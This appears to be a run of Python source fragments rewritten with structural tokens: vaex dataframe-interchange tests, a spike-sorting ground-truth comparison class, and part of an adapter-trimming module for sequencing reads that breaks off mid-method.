order="F")<line_sep>x_buffer=_VaexBuffer(x)<assert_stmt>x_buffer.bufsize<eq>5<times>x.itemsize<assert_stmt>x_buffer.ptr<eq>x.__array_interface__["data"][0]<assert_stmt>x_buffer.__dlpack_device__()<eq>(1 <none>)<assert_stmt>x_buffer.__repr__()<eq>f"VaexBuffer({{'bufsize': {5<times>x.itemsize}, 'ptr': {x.__array_interface__['data'][0]}, 'device': 'CPU'}})"<with_stmt>pytest.raises(NotImplementedError)<block_start><assert_stmt>x_buffer.__dlpack__()<block_end><block_end><def_stmt>test_VaexDataFrame <block_start>df=vaex.from_arrays(x=np.array([<true> <true> <false>]) y=np.array([1 2 0]) z=np.array([9.2 10.5 11.8]))<line_sep>df2=df.__dataframe__()<assert_stmt>df2._allow_copy<eq><true><assert_stmt>df2.num_columns()<eq>3<assert_stmt>df2.num_rows()<eq>3<assert_stmt>df2.num_chunks()<eq>1<assert_stmt>df2.column_names()<eq>["x" "y" "z"]<assert_stmt>df2.get_column(0)._col.tolist()<eq>df.x.tolist()<assert_stmt>df2.get_column_by_name("y")._col.tolist()<eq>df.y.tolist()<for_stmt>col df2.get_columns()<block_start><assert_stmt>col._col.tolist()<eq>df[col._col.expression].tolist()<block_end><assert_stmt>df2.select_columns((0 2))._df[: 0].tolist()<eq>df2.select_columns_by_name(("x" "z"))._df[: 0].tolist()<assert_stmt>df2.select_columns((0 2))._df[: 1].tolist()<eq>df2.select_columns_by_name(("x" "z"))._df[: 1].tolist()<block_end><def_stmt>test_chunks df_factory<block_start>x=np.arange(10)<line_sep>df=df_factory(x=x)<line_sep>df2=df.__dataframe__()<line_sep>chunk_iter=iter(df2.get_chunks(3))<line_sep>chunk=next(chunk_iter)<assert_stmt>chunk.num_rows()<eq>4<line_sep>chunk=next(chunk_iter)<assert_stmt>chunk.num_rows()<eq>4<line_sep>chunk=next(chunk_iter)<assert_stmt>chunk.num_rows()<eq>2<with_stmt>pytest.raises(StopIteration)<block_start>chunk=next(chunk_iter)<block_end><block_end><def_stmt>assert_buffer_equal buffer_dtype:Tuple[_VaexBuffer Any] vaexcol:vaex.expression.Expression<block_start>buf,dtype=buffer_dtype<line_sep>pytest.raises(NotImplementedError buf.__dlpack__)<assert_stmt>buf.__dlpack_device__()<eq>(1 <none>)<assert_stmt>dtype[1]<eq>vaexcol.dtype.index_type.numpy.itemsize<times>8<if_stmt><not>isinstance(vaexcol.values np.ndarray)<and>isinstance(vaexcol.values.type pa.DictionaryType)<block_start><assert_stmt>dtype[2]<eq>vaexcol.index_values().dtype.numpy.str<block_end><else_stmt><block_start><assert_stmt>dtype[2]<eq>vaexcol.dtype.numpy.str<block_end><block_end><def_stmt>assert_column_equal col:_VaexColumn vaexcol:vaex.expression.Expression<block_start><assert_stmt>col.size<eq>vaexcol.df.count("*")<assert_stmt>col.offset<eq>0<assert_stmt>col.null_count<eq>vaexcol.countmissing()<line_sep>assert_buffer_equal(col._get_data_buffer() vaexcol)<block_end><def_stmt>assert_dataframe_equal dfo:DataFrameObject df:vaex.dataframe.DataFrame<block_start><assert_stmt>dfo.num_columns()<eq>len(df.columns)<assert_stmt>dfo.num_rows()<eq>len(df)<assert_stmt>dfo.column_names()<eq>list(df.get_column_names())<for_stmt>col df.get_column_names()<block_start>assert_column_equal(dfo.get_column_by_name(col) df[col])<block_end><block_end> |
<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<import_from_stmt>.basecomparison BaseTwoSorterComparison<import_from_stmt>.comparisontools do_score_labels make_possible_match make_best_match make_hungarian_match do_confusion_matrix do_count_score compute_performance <class_stmt>GroundTruthComparison(BaseTwoSorterComparison)<block_start>"""
Compares a sorter to a ground truth.
This class can:
* compute a "match between gt_sorting and tested_sorting
* compute optionally the score label (TP, FN, CL, FP) for each spike
* count by unit of GT the total of each (TP, FN, CL, FP) into a Dataframe
GroundTruthComparison.count
* compute the confusion matrix .get_confusion_matrix()
* compute some performance metric with several strategy based on
the count score by unit
* count well detected units
* count false positive detected units
* count redundant units
* count overmerged units
* summary all this
Parameters
----------
gt_sorting: SortingExtractor
The first sorting for the comparison
tested_sorting: SortingExtractor
The second sorting for the comparison
gt_name: str
The name of sorter 1
tested_name: : str
The name of sorter 2
delta_time: float
Number of ms to consider coincident spikes (default 0.4 ms) match_score: float
Minimum agreement score to match units (default 0.5)
chance_score: float
Minimum agreement score to for a possible match (default 0.1)
redundant_score: float
Agreement score above which units are redundant (default 0.2)
overmerged_score: float
Agreement score above which units can be overmerged (default 0.2)
well_detected_score: float
Agreement score above which units are well detected (default 0.8)
exhaustive_gt: bool (default True)
Tell if the ground true is "exhaustive" or not. In other world if the
GT have all possible units. It allows more performance measurement.
For instance, MEArec simulated dataset have exhaustive_gt=True
match_mode: 'hungarian', or 'best'
What is match used for counting : 'hungarian' or 'best match'.
n_jobs: int
Number of cores to use in parallel. Uses all available if -1
compute_labels: bool
If True, labels are computed at instantiation (default False)
compute_misclassifications: bool
If True, misclassifications are computed at instantiation (default False)
verbose: bool
If True, output is verbose
Returns
-------
sorting_comparison: SortingComparison
The SortingComparison object
"""<def_stmt>__init__ self gt_sorting tested_sorting gt_name=<none> tested_name=<none> delta_time=0.4 sampling_frequency=<none> match_score=0.5 well_detected_score=0.8 redundant_score=0.2 overmerged_score=0.2 chance_score=0.1 exhaustive_gt=<false> n_jobs=-1 match_mode='hungarian' compute_labels=<false> compute_misclassifications=<false> verbose=<false><block_start><if_stmt>gt_name<is><none><block_start>gt_name='ground truth'<block_end><if_stmt>tested_name<is><none><block_start>tested_name='tested'<block_end>BaseTwoSorterComparison.__init__(self gt_sorting tested_sorting sorting1_name=gt_name sorting2_name=tested_name delta_time=delta_time match_score=match_score # sampling_frequency=sampling_frequency,
chance_score=chance_score n_jobs=n_jobs verbose=verbose)<line_sep>self.exhaustive_gt=exhaustive_gt<line_sep>self._compute_misclassifications=compute_misclassifications<line_sep>self.redundant_score=redundant_score<line_sep>self.overmerged_score=overmerged_score<line_sep>self.well_detected_score=well_detected_score<assert_stmt>match_mode<in>['hungarian' 'best']<line_sep>self.match_mode=match_mode<line_sep>self._compute_labels=compute_labels<line_sep>self._do_count()<line_sep>self._labels_st1=<none><line_sep>self._labels_st2=<none><if_stmt>self._compute_labels<block_start>self._do_score_labels()<block_end># confusion matrix is compute on demand
self._confusion_matrix=<none><block_end><def_stmt>get_labels1 self unit_id<block_start><if_stmt>self._labels_st1<is><none><block_start>self._do_score_labels()<block_end><if_stmt>unit_id<in>self.sorting1.get_unit_ids()<block_start><return>self._labels_st1[unit_id]<block_end><else_stmt><block_start><raise>Exception("Unit_id is not a valid unit")<block_end><block_end><def_stmt>get_labels2 self unit_id<block_start><if_stmt>self._labels_st1<is><none><block_start>self._do_score_labels()<block_end><if_stmt>unit_id<in>self.sorting2.get_unit_ids()<block_start><return>self._labels_st2[unit_id]<block_end><else_stmt><block_start><raise>Exception("Unit_id is not a valid unit")<block_end><block_end><def_stmt>_do_matching self<block_start><if_stmt>self._verbose<block_start>print("Matching...")<block_end>self.possible_match_12,self.possible_match_21=make_possible_match(self.agreement_scores self.chance_score)<line_sep>self.best_match_12,self.best_match_21=make_best_match(self.agreement_scores self.chance_score)<line_sep>self.hungarian_match_12,self.hungarian_match_21=make_hungarian_match(self.agreement_scores self.match_score)<block_end><def_stmt>_do_count self<block_start>"""
Do raw count into a dataframe.
Internally use hungarian match or best match.
"""<if_stmt>self.match_mode<eq>'hungarian'<block_start>match_12=self.hungarian_match_12<block_end><elif_stmt>self.match_mode<eq>'best'<block_start>match_12=self.best_match_12<block_end>self.count_score=do_count_score(self.event_counts1 self.event_counts2 match_12 self.match_event_count)<block_end><def_stmt>_do_confusion_matrix self<block_start><if_stmt>self._verbose<block_start>print("Computing confusion matrix...")<block_end><if_stmt>self.match_mode<eq>'hungarian'<block_start>match_12=self.hungarian_match_12<block_end><elif_stmt>self.match_mode<eq>'best'<block_start>match_12=self.best_match_12<block_end>self._confusion_matrix=do_confusion_matrix(self.event_counts1 self.event_counts2 match_12 self.match_event_count)<block_end><def_stmt>get_confusion_matrix self<block_start>"""
Computes the confusion matrix.
Returns
-------
confusion_matrix: pandas.DataFrame
The confusion matrix
"""<if_stmt>self._confusion_matrix<is><none><block_start>self._do_confusion_matrix()<block_end><return>self._confusion_matrix<block_end><def_stmt>_do_score_labels self<block_start><assert_stmt>self.match_mode<eq>'hungarian' 'Labels (TP, FP, FN) can be computed only with hungarian match'<if_stmt>self._verbose<block_start>print("Adding labels...")<block_end>self._labels_st1,self._labels_st2=do_score_labels(self.sorting1 self.sorting2 self.delta_frames self.hungarian_match_12 self._compute_misclassifications)<block_end><def_stmt>get_performance self method='by_unit' output='pandas'<block_start>"""
Get performance rate with several method:
* 'raw_count' : just render the raw count table
* 'by_unit' : render perf as rate unit by unit of the GT
* 'pooled_with_average' : compute rate unit by unit and average
Parameters
----------
method: str
'by_unit', or 'pooled_with_average'
output: str
'pandas' or 'dict'
Returns
-------
perf: pandas dataframe/series (or dict)
dataframe/series (based on 'output') with performance entries
"""<line_sep>possibles=('raw_count' 'by_unit' 'pooled_with_average')<if_stmt>method<not><in>possibles<block_start><raise>Exception("'method' can be "+' or '.join(possibles))<block_end><if_stmt>method<eq>'raw_count'<block_start>perf=self.count_score<block_end><elif_stmt>method<eq>'by_unit'<block_start>perf=compute_performance(self.count_score)<block_end><elif_stmt>method<eq>'pooled_with_average'<block_start>perf=self.get_performance(method='by_unit').mean(axis=0)<block_end><if_stmt>output<eq>'dict'<and>isinstance(perf pd.Series)<block_start>perf=perf.to_dict()<block_end><return>perf<block_end><def_stmt>print_performance self method='pooled_with_average'<block_start>"""
Print performance with the selected method
"""<line_sep>template_txt_performance=_template_txt_performance<if_stmt>method<eq>'by_unit'<block_start>perf=self.get_performance(method=method output='pandas')<line_sep>perf=perf<times>100<line_sep># ~ print(perf)
d={k:perf[k].tolist()<for>k perf.columns}<line_sep>txt=template_txt_performance.format(method=method **d)<line_sep>print(txt)<block_end><elif_stmt>method<eq>'pooled_with_average'<block_start>perf=self.get_performance(method=method output='pandas')<line_sep>perf=perf<times>100<line_sep>txt=template_txt_performance.format(method=method **perf.to_dict())<line_sep>print(txt)<block_end><block_end><def_stmt>print_summary self well_detected_score=<none> redundant_score=<none> overmerged_score=<none><block_start>"""
Print a global performance summary that depend on the context:
* exhaustive= True/False
* how many gt units (one or several)
This summary mix several performance metrics.
"""<line_sep>txt=_template_summary_part1<line_sep>d=dict(num_gt=len(self.unit1_ids) num_tested=len(self.unit2_ids) num_well_detected=self.count_well_detected_units(well_detected_score) num_redundant=self.count_redundant_units(redundant_score) num_overmerged=self.count_overmerged_units(overmerged_score) )<if_stmt>self.exhaustive_gt<block_start>txt=txt+_template_summary_part2<line_sep>d['num_false_positive_units']=self.count_false_positive_units()<line_sep>d['num_bad']=self.count_bad_units()<block_end>txt=txt.format(**d)<line_sep>print(txt)<block_end><def_stmt>get_well_detected_units self well_detected_score=<none><block_start>"""
Return units list of "well detected units" from tested_sorting.
"well detected units" are defined as units in tested that
are well matched to GT units.
Parameters
----------
well_detected_score: float (default 0.8)
The agreement score above which tested units
are counted as "well detected".
"""<if_stmt>well_detected_score<is><not><none><block_start>self.well_detected_score=well_detected_score<block_end>matched_units2=self.hungarian_match_12<line_sep>well_detected_ids=[]<for_stmt>u2 self.unit2_ids<block_start><if_stmt>u2<in>list(matched_units2.values)<block_start>u1=self.hungarian_match_21[u2]<line_sep>score=self.agreement_scores.at[u1 u2]<if_stmt>score<ge>self.well_detected_score<block_start>well_detected_ids.append(u2)<block_end><block_end><block_end><return>well_detected_ids<block_end><def_stmt>count_well_detected_units self well_detected_score<block_start>"""
Count how many well detected units.
kwargs are the same as get_well_detected_units.
"""<line_sep><return>len(self.get_well_detected_units(well_detected_score=well_detected_score))<block_end><def_stmt>get_false_positive_units self redundant_score=<none><block_start>"""
Return units list of "false positive units" from tested_sorting.
"false positive units" are defined as units in tested that
are not matched at all in GT units.
Need exhaustive_gt=True
Parameters
----------
redundant_score: float (default 0.2)
The agreement score below which tested units
are counted as "false positive"" (and not "redundant").
"""<assert_stmt>self.exhaustive_gt 'false_positive_units list is valid only if exhaustive_gt=True'<if_stmt>redundant_score<is><not><none><block_start>self.redundant_score=redundant_score<block_end>matched_units2=list(self.hungarian_match_12.values)<line_sep>false_positive_ids=[]<for_stmt>u2 self.unit2_ids<block_start><if_stmt>u2<not><in>matched_units2<block_start><if_stmt>self.best_match_21[u2]<eq>-1<block_start>false_positive_ids.append(u2)<block_end><else_stmt><block_start>u1=self.best_match_21[u2]<line_sep>score=self.agreement_scores.at[u1 u2]<if_stmt>score<l>self.redundant_score<block_start>false_positive_ids.append(u2)<block_end><block_end><block_end><block_end><return>false_positive_ids<block_end><def_stmt>count_false_positive_units self redundant_score=<none><block_start>"""
See get_false_positive_units().
"""<line_sep><return>len(self.get_false_positive_units(redundant_score))<block_end><def_stmt>get_redundant_units self redundant_score=<none><block_start>"""
Return "redundant units"
"redundant units" are defined as units in tested
that match a GT units with a big agreement score
but it is not the best match.
In other world units in GT that detected twice or more.
Parameters
----------
redundant_score=None: float (default 0.2)
The agreement score above which tested units
are counted as "redundant" (and not "false positive" ).
"""<assert_stmt>self.exhaustive_gt 'redundant_units list is valid only if exhaustive_gt=True'<if_stmt>redundant_score<is><not><none><block_start>self.redundant_score=redundant_score<block_end>matched_units2=list(self.hungarian_match_12.values)<line_sep>redundant_ids=[]<for_stmt>u2 self.unit2_ids<block_start><if_stmt>u2<not><in>matched_units2<and>self.best_match_21[u2]<ne>-1<block_start>u1=self.best_match_21[u2]<if_stmt>u2<ne>self.best_match_12[u1]<block_start>score=self.agreement_scores.at[u1 u2]<if_stmt>score<ge>self.redundant_score<block_start>redundant_ids.append(u2)<block_end><block_end><block_end><block_end><return>redundant_ids<block_end><def_stmt>count_redundant_units self redundant_score=<none><block_start>"""
See get_redundant_units().
"""<line_sep><return>len(self.get_redundant_units(redundant_score=redundant_score))<block_end><def_stmt>get_overmerged_units self overmerged_score=<none><block_start>"""
Return "overmerged units"
"overmerged units" are defined as units in tested
that match more than one GT unit with an agreement score larger than overmerged_score.
Parameters
----------
overmerged_score: float (default 0.4)
Tested units with 2 or more agreement scores above 'overmerged_score'
are counted as "overmerged".
"""<assert_stmt>self.exhaustive_gt 'overmerged_units list is valid only if exhaustive_gt=True'<if_stmt>overmerged_score<is><not><none><block_start>self.overmerged_score=overmerged_score<block_end>overmerged_ids=[]<for_stmt>u2 self.unit2_ids<block_start>scores=self.agreement_scores.loc[: u2]<if_stmt>len(np.where(scores<g>self.overmerged_score)[0])<g>1<block_start>overmerged_ids.append(u2)<block_end><block_end><return>overmerged_ids<block_end><def_stmt>count_overmerged_units self overmerged_score=<none><block_start>"""
See get_overmerged_units().
"""<line_sep><return>len(self.get_overmerged_units(overmerged_score=overmerged_score))<block_end><def_stmt>get_bad_units self<block_start>"""
Return units list of "bad units".
"bad units" are defined as units in tested that are not
in the best match list of GT units.
So it is the union of "false positive units" + "redundant units".
Need exhaustive_gt=True
"""<assert_stmt>self.exhaustive_gt 'bad_units list is valid only if exhaustive_gt=True'<line_sep>matched_units2=list(self.hungarian_match_12.values)<line_sep>bad_ids=[]<for_stmt>u2 self.unit2_ids<block_start><if_stmt>u2<not><in>matched_units2<block_start>bad_ids.append(u2)<block_end><block_end><return>bad_ids<block_end><def_stmt>count_bad_units self<block_start>"""
See get_bad_units
"""<line_sep><return>len(self.get_bad_units())<block_end><block_end># usefull also for gathercomparison
_template_txt_performance="""PERFORMANCE ({method})
-----------
ACCURACY: {accuracy}
RECALL: {recall}
PRECISION: {precision}
FALSE DISCOVERY RATE: {false_discovery_rate}
MISS RATE: {miss_rate}
"""<line_sep>_template_summary_part1="""SUMMARY
-------
GT num_units: {num_gt}
TESTED num_units: {num_tested}
num_well_detected: {num_well_detected}
num_redundant: {num_redundant}
num_overmerged: {num_overmerged}
"""<line_sep>_template_summary_part2="""num_false_positive_units {num_false_positive_units}
num_bad: {num_bad}
"""<def_stmt>compare_sorter_to_ground_truth *args **kwargs<block_start><return>GroundTruthComparison(*args **kwargs)<block_end>compare_sorter_to_ground_truth.__doc__=GroundTruthComparison.__doc__<line_sep> |
"""
Adapter finding and trimming classes
The ...Adapter classes are responsible for finding adapters.
The ...Match classes trim the reads.
"""<import_stmt>logging<import_from_stmt>enum IntFlag<import_from_stmt>collections defaultdict<import_from_stmt>typing Optional Tuple Sequence Dict Any List Union<import_from_stmt>abc ABC abstractmethod<import_from_stmt>.align EndSkip Aligner PrefixComparer SuffixComparer edit_environment hamming_environment<line_sep>logger=logging.getLogger()<class_stmt>InvalidCharacter(Exception)<block_start><pass><block_end># TODO remove this enum, this should be within each Adapter class
<class_stmt>Where(IntFlag)<block_start>"""
Aligner flag combinations for all adapter types.
"REFERENCE" is the adapter sequence, "QUERY" is the read sequence
"""<line_sep>BACK=EndSkip.QUERY_START|EndSkip.QUERY_STOP|EndSkip.REFERENCE_END<line_sep>FRONT=EndSkip.QUERY_START|EndSkip.QUERY_STOP|EndSkip.REFERENCE_START<line_sep>PREFIX=EndSkip.QUERY_STOP<line_sep>SUFFIX=EndSkip.QUERY_START<line_sep># Just like FRONT/BACK, but without internal matches
FRONT_NOT_INTERNAL=EndSkip.REFERENCE_START|EndSkip.QUERY_STOP<line_sep>BACK_NOT_INTERNAL=EndSkip.QUERY_START|EndSkip.REFERENCE_END<line_sep>ANYWHERE=EndSkip.SEMIGLOBAL<block_end><def_stmt>returns_defaultdict_int # We need this function to make EndStatistics picklable.
# Even a @staticmethod of EndStatistics is not sufficient
# as that is not picklable before Python 3.5.
<block_start><return>defaultdict(int)<block_end><class_stmt>EndStatistics<block_start>"""Statistics about the 5' or 3' end"""<def_stmt>__init__ self adapter:"SingleAdapter"<block_start>self.max_error_rate:float=adapter.max_error_rate<line_sep>self.sequence:str=adapter.sequence<line_sep>self.effective_length:int=adapter.effective_length<line_sep>self.has_wildcards:bool=adapter.adapter_wildcards<line_sep>self.indels:bool=adapter.indels<line_sep>self.adapter_type:str=adapter.descriptive_identifier()<line_sep>self.allows_partial_matches:bool=adapter.allows_partial_matches<line_sep># self.errors[l][e] == n iff a sequence of length l matching at e errors was removed n times
self.errors:Dict[int Dict[int int]]=defaultdict(returns_defaultdict_int)<line_sep>self.adjacent_bases={'A':0 'C':0 'G':0 'T':0 '':0}<line_sep># TODO avoid hard-coding the list of classes
self._remove_prefix=isinstance(adapter FrontAdapter)<block_end><def_stmt>__repr__ self<block_start>errors={k:dict(v)<for>k,v self.errors.items()}<line_sep><return>"EndStatistics(max_error_rate={}, errors={}, adjacent_bases={})".format(self.max_error_rate errors self.adjacent_bases )<block_end><def_stmt>__iadd__ self other:Any<block_start><if_stmt><not>isinstance(other self.__class__)<block_start><raise>ValueError("Cannot compare")<block_end><if_stmt>(self.max_error_rate<ne>other.max_error_rate<or>self.sequence<ne>other.sequence<or>self.effective_length<ne>other.effective_length<or>self.indels<ne>other.indels)<block_start><raise>RuntimeError('Incompatible EndStatistics, cannot be added')<block_end><for_stmt>base ('A' 'C' 'G' 'T' '')<block_start>self.adjacent_bases[base]<augadd>other.adjacent_bases[base]<block_end><for_stmt>length,error_dict other.errors.items()<block_start><for_stmt>errors error_dict<block_start>self.errors[length][errors]<augadd>other.errors[length][errors]<block_end><block_end><return>self<block_end>@property<def_stmt>lengths self<block_start>d={length:sum(errors.values())<for>length,errors self.errors.items()}<line_sep><return>d<block_end><def_stmt>random_match_probabilities self gc_content:float<arrow>List[float]<block_start>"""
Estimate probabilities that this adapter end matches a
random sequence. Indels are not taken into account.
Returns a list p, where p[i] is the probability that
i bases of this adapter match a random sequence with
GC content gc_content.
"""<assert_stmt>0.0<le>gc_content<le>1.0<line_sep>seq=self.sequence<line_sep># FIXME this is broken for 'anywhere' adapters
<if_stmt>self._remove_prefix<block_start>seq=seq[::-1]<block_end>allowed_bases='CGRYSKMBDHVN'<if>self.has_wildcards<else>'GC'<line_sep>p=1.<line_sep>probabilities=[p]<for_stmt>i,c enumerate(seq)<block_start><if_stmt>c<in>allowed_bases<block_start>p<augmul>gc_content/2.<block_end><else_stmt><block_start>p<augmul>(1.-gc_content)/2.<block_end>probabilities.append(p)<block_end><return>probabilities<block_end><block_end><class_stmt>AdapterStatistics(ABC)<block_start>reverse_complemented:int=0<line_sep>name:str<line_sep>adapter:"Adapter"<line_sep>@abstractmethod<def_stmt>__iadd__ self other<block_start><pass><block_end>@abstractmethod<def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><pass><block_end>@abstractmethod<def_stmt>add_match self match<arrow><none><block_start><pass><block_end><block_end><class_stmt>SingleAdapterStatistics(AdapterStatistics ABC)<block_start>"""
Statistics about a 5' or 3' adapter, where we only need to keep track of sequences
removed from one "end".
"""<def_stmt>__init__ self adapter:"SingleAdapter"<block_start>self.name=adapter.name<line_sep>self.adapter=adapter<line_sep>self.end=EndStatistics(adapter)<block_end><def_stmt>__repr__ self<block_start><return>f"SingleAdapterStatistics(name={self.name}, end={self.end})"<block_end><def_stmt>__iadd__ self other:"SingleAdapterStatistics"<block_start><if_stmt><not>isinstance(other self.__class__)<block_start><raise>ValueError("Cannot iadd")<block_end>self.end<augadd>other.end<line_sep>self.reverse_complemented<augadd>other.reverse_complemented<line_sep><return>self<block_end><block_end><class_stmt>FrontAdapterStatistics(SingleAdapterStatistics)<block_start><def_stmt>add_match self match:"RemoveBeforeMatch"<block_start>self.end.errors[match.removed_sequence_length()][match.errors]<augadd>1<block_end><def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><return>self.end <none><block_end><block_end><class_stmt>BackAdapterStatistics(SingleAdapterStatistics)<block_start><def_stmt>add_match self match:"RemoveAfterMatch"<block_start>adjacent_base=match.adjacent_base()<line_sep>self.end.errors[match.removed_sequence_length()][match.errors]<augadd>1<try_stmt><block_start>self.end.adjacent_bases[adjacent_base]<augadd>1<block_end><except_stmt>KeyError<block_start>self.end.adjacent_bases[""]<augadd>1<block_end><block_end><def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><return><none> self.end<block_end><block_end><class_stmt>LinkedAdapterStatistics(AdapterStatistics)<block_start>"""
Statistics about sequences removed by a lined adapter.
"""<def_stmt>__init__ self adapter:"LinkedAdapter" front:"SingleAdapter" back:"SingleAdapter" <block_start>self.name=adapter.name<line_sep>self.adapter=adapter<line_sep>self.front=EndStatistics(front)<line_sep>self.back=EndStatistics(back)<line_sep>self.reverse_complemented=0<block_end><def_stmt>__repr__ self<block_start><return>f"LinkedAdapterStatistics(name={self.name}, front={self.front}, back={self.back})"<block_end><def_stmt>__iadd__ self other:"LinkedAdapterStatistics"<block_start><if_stmt><not>isinstance(other self.__class__)<block_start><raise>ValueError("Cannot iadd")<block_end>self.front<augadd>other.front<line_sep>self.back<augadd>other.back<line_sep>self.reverse_complemented<augadd>other.reverse_complemented<line_sep><return>self<block_end><def_stmt>add_match self match:"LinkedMatch"# TODO this is duplicated code
<block_start><if_stmt>match.front_match<block_start>self.front.errors[match.front_match.removed_sequence_length()][match.errors]<augadd>1<block_end><if_stmt>match.back_match<block_start>adjacent_base=match.back_match.adjacent_base()<line_sep>self.back.errors[match.back_match.removed_sequence_length()][match.errors]<augadd>1<try_stmt><block_start>self.back.adjacent_bases[adjacent_base]<augadd>1<block_end><except_stmt>KeyError<block_start>self.back.adjacent_bases[""]<augadd>1<block_end><block_end><block_end><def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><return>self.front self.back<block_end><block_end><class_stmt>AnywhereAdapterStatistics(AdapterStatistics)<block_start>"""
Statistics about sequences removed by a lined adapter.
"""<def_stmt>__init__ self adapter:"AnywhereAdapter"<block_start>self.name=adapter.name<line_sep>self.adapter=adapter<line_sep>self.front=EndStatistics(adapter)<line_sep>self.back=EndStatistics(adapter)<line_sep>self.reverse_complemented=0<block_end><def_stmt>__repr__ self<block_start><return>f"AnywhereAdapterStatistics(name={self.name}, front={self.front}, back={self.back})"<block_end><def_stmt>__iadd__ self other:"AnywhereAdapterStatistics"<block_start><if_stmt><not>isinstance(other AnywhereAdapterStatistics)<block_start><raise>ValueError("Cannot add")<block_end>self.front<augadd>other.front<line_sep>self.back<augadd>other.back<line_sep>self.reverse_complemented<augadd>other.reverse_complemented<line_sep><return>self<block_end><def_stmt>add_match self match:Union["RemoveBeforeMatch" "RemoveAfterMatch"]<arrow><none># TODO contains duplicated code from the other add_match() methods
<block_start><if_stmt>isinstance(match RemoveBeforeMatch)<block_start>self.front.errors[match.removed_sequence_length()][match.errors]<augadd>1<block_end><else_stmt><block_start>adjacent_base=match.adjacent_base()<line_sep>self.back.errors[match.removed_sequence_length()][match.errors]<augadd>1<try_stmt><block_start>self.back.adjacent_bases[adjacent_base]<augadd>1<block_end><except_stmt>KeyError<block_start>self.back.adjacent_bases[""]<augadd>1<block_end><block_end><block_end><def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><return>self.front self.back<block_end><block_end><class_stmt>Match(ABC)<block_start>adapter:"Adapter"<line_sep>@abstractmethod<def_stmt>remainder_interval self<arrow>Tuple[int int]<block_start><pass><block_end>@abstractmethod<def_stmt>retained_adapter_interval self<arrow>Tuple[int int]<block_start><pass><block_end>@abstractmethod<def_stmt>get_info_records self read<arrow>List[List]<block_start><pass><block_end>@abstractmethod<def_stmt>trimmed self read<block_start><pass><block_end><block_end><class_stmt>SingleMatch(Match ABC)<block_start>"""
Representation of a single adapter matched to a single string
"""<line_sep>__slots__=['astart' 'astop' 'rstart' 'rstop' 'matches' 'errors' 'adapter' 'sequence' 'length' 'adjacent_base']<def_stmt>__init__ self astart:int astop:int rstart:int rstop:int matches:int errors:int adapter:"SingleAdapter" sequence:str <block_start>self.astart:int=astart<line_sep>self.astop:int=astop<line_sep>self.rstart:int=rstart<line_sep>self.rstop:int=rstop<line_sep>self.matches:int=matches<line_sep>self.errors:int=errors<line_sep>self.adapter:SingleAdapter=adapter<line_sep>self.sequence=sequence<line_sep># Number of aligned characters in the adapter. If there are
# indels, this may be different from the number of characters
# in the read.
self.length:int=astop-astart<block_end><def_stmt>__repr__ self<block_start><return>'SingleMatch(astart={}, astop={}, rstart={}, rstop={}, matches={}, errors={})'.format(self.astart self.astop self.rstart self.rstop self.matches self.errors)<block_end><def_stmt>__eq__ self other<arrow>bool<block_start><return>(other.__class__<is>self.__class__<and>self.astart<eq>other.astart<and>self.astop<eq>other.astop<and>self.rstart<eq>other.rstart<and>self.rstop<eq>other.rstop<and>self.matches<eq>other.matches<and>self.errors<eq>other.errors<and>self.adapter<is>other.adapter<and>self.sequence<eq>other.sequence)<block_end><def_stmt>wildcards self wildcard_char:str="N"<arrow>str<block_start>"""
Return a string that contains, for each wildcard character,
the character that it matches. For example, if the adapter
ATNGNA matches ATCGTA, then the string 'CT' is returned.
If there are indels, this is not reliable as the full alignment
is not available.
"""<line_sep>wildcards=[self.sequence[self.rstart+i]<for>i range(self.length)<if>self.adapter.sequence[self.astart+i]<eq>wildcard_char<and>self.rstart+i<l>len(self.sequence)]<line_sep><return>''.join(wildcards)<block_end><def_stmt>get_info_records self read<arrow>List[List]<block_start>seq=read.sequence<line_sep>qualities=read.qualities<line_sep>info=["" self.errors self.rstart self.rstop seq[0:self.rstart] seq[self.rstart:self.rstop] seq[self.rstop:] self.adapter.name ]<if_stmt>qualities<block_start>info<augadd>[qualities[0:self.rstart] qualities[self.rstart:self.rstop] qualities[self.rstop:] ]<block_end><else_stmt><block_start>info<augadd>["" "" ""]<block_end><return>[info]<block_end>@abstractmethod<def_stmt>removed_sequence_length self<arrow>int<block_start><pass><block_end><block_end><class_stmt>RemoveBeforeMatch(SingleMatch)<block_start>"""A match that removes sequence before the match"""<def_stmt>__repr__ self<block_start><return>'RemoveBeforeMatch(astart={}, astop={}, rstart={}, rstop={}, matches={}, errors={})'.format(self.astart self.astop self.rstart self.rstop self.matches self.errors)<block_end><def_stmt>rest self<arrow>str<block_start>"""
Return the part of the read before this match if this is a
'front' (5') adapter,
return the part after the match if this is not a 'front' adapter (3').
This can be an empty string.
"""<line_sep><return>self.sequence[:self.rstart]<block_end><def_stmt>remainder_interval self<arrow>Tuple[int int]<block_start>"""
Return an interval (start, stop) that describes the part of the read that would
remain after trimming
"""<line_sep><return>self.rstop len(self.sequence)<block_end><def_stmt>retained_adapter_interval self<arrow>Tuple[int int]<block_start><return>self.rstart len(self.sequence)<block_end><def_stmt>trim_slice self# Same as remainder_interval, but as a slice() object
<block_start><return>slice(self.rstop <none>)<block_end><def_stmt>trimmed self read<block_start><return>read[self.rstop:]<block_end><def_stmt>removed_sequence_length self<arrow>int<block_start><return>self.rstop<block_end><block_end><class_stmt>RemoveAfterMatch(SingleMatch)<block_start>"""A match that removes sequence after the match"""<def_stmt>__repr__ self<block_start><return>"RemoveAfterMatch(astart={}, astop={}, rstart={}, rstop={}, matches={}, errors={})".format(self.astart self.astop self.rstart self.rstop self.matches self.errors)<block_end><def_stmt>rest self<arrow>str<block_start>"""
Return the part of the read before this match if this is a
'front' (5') adapter,
return the part after the match if this is not a 'front' adapter (3').
This can be an empty string.
"""<line_sep><return>self.sequence[self.rstop:]<block_end><def_stmt>remainder_interval self<arrow>Tuple[int int]<block_start>"""
Return an interval (start, stop) that describes the part of the read that would
remain after trimming
"""<line_sep><return>0 self.rstart<block_end><def_stmt>retained_adapter_interval self<arrow>Tuple[int int]<block_start><return>0 self.rstop<block_end><def_stmt>trim_slice self# Same as remainder_interval, but as a slice() object
